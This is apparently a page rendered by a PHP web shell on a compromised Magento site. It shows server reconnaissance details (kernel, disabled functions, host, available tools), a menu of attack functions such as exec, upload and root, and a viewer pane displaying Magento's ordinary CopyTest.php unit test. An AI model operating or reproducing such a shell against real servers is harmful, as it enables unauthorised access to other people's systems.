Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 05:03:21
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/DataObject/Test/Unit/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/DataObject/Test/Unit/CopyTest.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ declare(strict_types=1); namespace Magento\Framework\DataObject\Test\Unit; use Magento\Framework\Api\AbstractSimpleObject; use Magento\Framework\Api\ExtensibleDataInterface; use Magento\Framework\Api\ExtensionAttributesFactory; use Magento\Framework\DataObject; use Magento\Framework\DataObject\Copy; use Magento\Framework\DataObject\Copy\Config; use Magento\Framework\Event\ManagerInterface; use Magento\Quote\Model\Quote\Address; use PHPUnit\Framework\MockObject\MockObject; use PHPUnit\Framework\TestCase; /** * Unit tests coverage for @see \Magento\Framework\DataObject\Copy */ class CopyTest extends TestCase { /** * @var Copy */ protected $copy; /** * @var MockObject */ protected $fieldsetConfigMock; /** * @var MockObject */ protected $eventManagerMock; /** * @var MockObject */ protected $targetMock; /** * @var MockObject */ protected $sourceMock; /** * @var MockObject */ protected $extensionAttributesFactoryMock; protected function setUp(): void { $this->fieldsetConfigMock = $this->createMock(Config::class); $this->eventManagerMock = $this->getMockForAbstractClass(ManagerInterface::class); $this->sourceMock = $this->createMock(DataObject::class); $this->targetMock = $this->createMock(DataObject::class); $this->extensionAttributesFactoryMock = $this->createMock(ExtensionAttributesFactory::class); $this->copy = new Copy( $this->eventManagerMock, $this->fieldsetConfigMock, $this->extensionAttributesFactoryMock ); } public function testCopyFieldsetToTargetWhenFieldsetInputInvalid() { $this->fieldsetConfigMock->expects($this->never())->method('getFieldset'); $this->assertNull( $this->copy->copyFieldsetToTarget('fieldset', 'aspect', [], 'target') ); } public function testCopyFieldsetToTargetWhenFieldIsNotExists() { $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn(null); $this->eventManagerMock->expects($this->never())->method('dispatch'); $this->assertEquals( [$this->targetMock], $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $this->sourceMock, [$this->targetMock]) ); } public function testCopyFieldsetToTargetWhenFieldExists() { $fields['code']['node']['aspect'] = []; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $eventName = sprintf('core_copy_fieldset_%s_%s', 'fieldset', 'aspect'); $data = [ 'target' => new DataObject([$this->targetMock]), 'source' => $this->sourceMock, 'root' => 'global', ]; $this->eventManagerMock->expects($this->once())->method('dispatch')->with($eventName, $data); $this->assertEquals( [$this->targetMock], $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $this->sourceMock, [$this->targetMock]) ); } public function testCopyFieldsetToTargetWhenTargetNotArray() { $fields['code']['aspect'] = 'value'; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $this->sourceMock ->expects($this->once()) ->method('getDataUsingMethod') ->with('code') ->willReturn('value'); $this->targetMock ->expects($this->once()) ->method('setDataUsingMethod') ->with('value')->willReturnSelf(); $eventName = sprintf('core_copy_fieldset_%s_%s', 'fieldset', 'aspect'); $data = [ 'target' => $this->targetMock, 'source' => $this->sourceMock, 'root' => 'global', ]; $this->eventManagerMock->expects($this->once())->method('dispatch')->with($eventName, $data); $this->assertEquals( $this->targetMock, $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $this->sourceMock, $this->targetMock) ); } public function testGetCopyFieldsetToTargetWhenTargetIsArray() { $fields['code']['aspect'] = 'value'; $target['code'] = []; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $this->sourceMock ->expects($this->once()) ->method('getDataUsingMethod') ->with('code') ->willReturn('value'); $this->targetMock ->expects($this->never()) ->method('setDataUsingMethod'); $eventName = sprintf('core_copy_fieldset_%s_%s', 'fieldset', 'aspect'); $newTarget = [ 'code' => [], 'value' => 'value', ]; $data = [ 'target' => new DataObject($newTarget), 'source' => $this->sourceMock, 'root' => 'global', ]; $this->eventManagerMock->expects($this->once())->method('dispatch')->with($eventName, $data); $this->assertEquals( $newTarget, $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $this->sourceMock, $target) ); } public function testGetCopyFieldsetToTargetWhenTargetIsExtensibleDataInterface() { $fields['code']['aspect'] = '*'; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $sourceMock = $this->getMockBuilder(ExtensibleDataInterface::class) ->addMethods(['getExtensionAttributes', 'getCode']) ->getMockForAbstractClass(); $targetMock = $this->getMockBuilder(ExtensibleDataInterface::class) ->addMethods(['getExtensionAttributes', 'setCode', 'setExtensionAttributes']) ->getMockForAbstractClass(); $sourceMock ->expects($this->any()) ->method('getExtensionAttributes') ->willReturnSelf(); $sourceMock ->expects($this->once()) ->method('getCode') ->willReturn('code'); $targetMock ->expects($this->any()) ->method('getExtensionAttributes') ->willReturnSelf(); $targetMock ->expects($this->any()) ->method('setExtensionAttributes') ->willReturnSelf(); $targetMock ->expects($this->once()) ->method('setCode') ->with('code'); $this->eventManagerMock->expects($this->once())->method('dispatch'); $result = $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $sourceMock, $targetMock); $this->assertEquals($result, $targetMock); } public function testGetCopyFieldsetToTargetWhenTargetIsAbstractSimpleObject() { $fields['code']['aspect'] = '*'; $source['code'] = 'code'; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $sourceMock = $this->createPartialMock( AbstractSimpleObject::class, [ '__toArray' ] ); $targetMock = $this->createPartialMock( AbstractSimpleObject::class, [ 'setData' ] ); $sourceMock ->expects($this->once()) ->method('__toArray') ->willReturn($source); $targetMock ->expects($this->once()) ->method('setData') ->with('code', 'code'); $this->eventManagerMock->expects($this->once())->method('dispatch'); $result = $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $sourceMock, $targetMock); $this->assertEquals($result, $targetMock); } public function testGetDataFromFieldsetWhenSourceIsInvalid() { $this->fieldsetConfigMock->expects($this->never())->method('getFieldset'); $this->assertNull($this->copy->getDataFromFieldset('fieldset', 'aspect', 'source')); } public function testGetDataFromFieldsetWhenFieldsetDoesNotExist() { $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn(null); $this->sourceMock ->expects($this->never()) ->method('getDataUsingMethod'); $this->assertNull($this->copy->getDataFromFieldset('fieldset', 'aspect', $this->sourceMock)); } public function testGetDataFromFieldsetWhenFieldExists() { $fields['code']['aspect'] = 'value'; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $this->sourceMock ->expects($this->once()) ->method('getDataUsingMethod') ->with('code') ->willReturn('value'); $this->assertEquals( ['value' => 'value'], $this->copy->getDataFromFieldset('fieldset', 'aspect', $this->sourceMock) ); } public function testGetDataFromFieldsetWhenFieldDoesNotExists() { $fields['code']['aspect'] = []; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $this->sourceMock ->expects($this->never()) ->method('getDataUsingMethod'); $this->assertEquals( [], $this->copy->getDataFromFieldset('fieldset', 'aspect', $this->sourceMock) ); } public function testGetExtensionAttributeForDataObjectChild() { $fields['code']['aspect'] = '*'; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $sourceMock = $this->getMockBuilder(Address::class) ->addMethods(['getCode']) ->onlyMethods(['getExtensionAttributes']) ->disableOriginalConstructor() ->getMock(); $targetMock = $this->getMockBuilder(Address::class) ->addMethods(['setCode']) ->onlyMethods(['getExtensionAttributes', 'setExtensionAttributes']) ->disableOriginalConstructor() ->getMock(); $sourceMock ->expects($this->any()) ->method('getExtensionAttributes') ->willReturnSelf(); $sourceMock ->expects($this->once()) ->method('getCode') ->willReturn('code'); $targetMock ->expects($this->any()) ->method('getExtensionAttributes') ->willReturnSelf(); $targetMock ->expects($this->any()) ->method('setExtensionAttributes') ->willReturnSelf(); $targetMock ->expects($this->once()) ->method('setCode') ->with('code'); $this->eventManagerMock->expects($this->once())->method('dispatch'); $result = $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $sourceMock, $targetMock); $this->assertEquals($result, $targetMock); } public function testGetDataObjectFieldFromExtensibleEntity() { $fields['code']['aspect'] = '*'; $this->fieldsetConfigMock ->expects($this->once()) ->method('getFieldset') ->with('fieldset', 'global') ->willReturn($fields); $sourceMock = $this->createPartialMock( Address::class, [ 'getExtensionAttributes' ] ); $targetMock = $this->createPartialMock( Address::class, [ 'getExtensionAttributes' ] ); $sourceMock ->expects($this->any()) ->method('getExtensionAttributes') ->willReturn(null); $value = 'code'; $sourceMock->setData('code', $value); $targetMock ->expects($this->any()) ->method('getExtensionAttributes') ->willReturn(null); $this->eventManagerMock->expects($this->once())->method('dispatch'); $result = $this->copy->copyFieldsetToTarget('fieldset', 'aspect', $sourceMock, $targetMock); $this->assertEquals($result, $targetMock); $this->assertEquals($value, $result->getCode()); } }